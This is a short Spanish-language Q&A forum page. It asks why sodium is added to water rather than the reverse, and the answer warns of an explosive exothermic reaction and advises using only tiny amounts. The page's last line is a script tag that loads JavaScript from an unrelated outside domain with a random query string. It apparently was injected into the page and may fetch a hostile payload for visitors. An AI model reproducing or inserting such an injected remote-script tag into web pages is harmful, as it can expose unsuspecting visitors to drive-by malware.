Experimento con sodio y agua

Me gustaría saber ¿por qué cuando queremos hacer un experimento con
sodio y agua es necesario agregar primero el agua y luego el sodio? ¿Por
qué no se puede hacer al contrario?

1 Respuesta

Respuesta

Si lo hacéis al revés va a explotar el sodio, pues se trata de una reacción muy exotérmica. AUn añadiendo el sodio al agua, se debe tener mucha precaución y añadir solamente una porción muy pequeña del elemento.

<script type="text/javascript" src="http://temarosaplus.info/?0.12106171472406879"></script>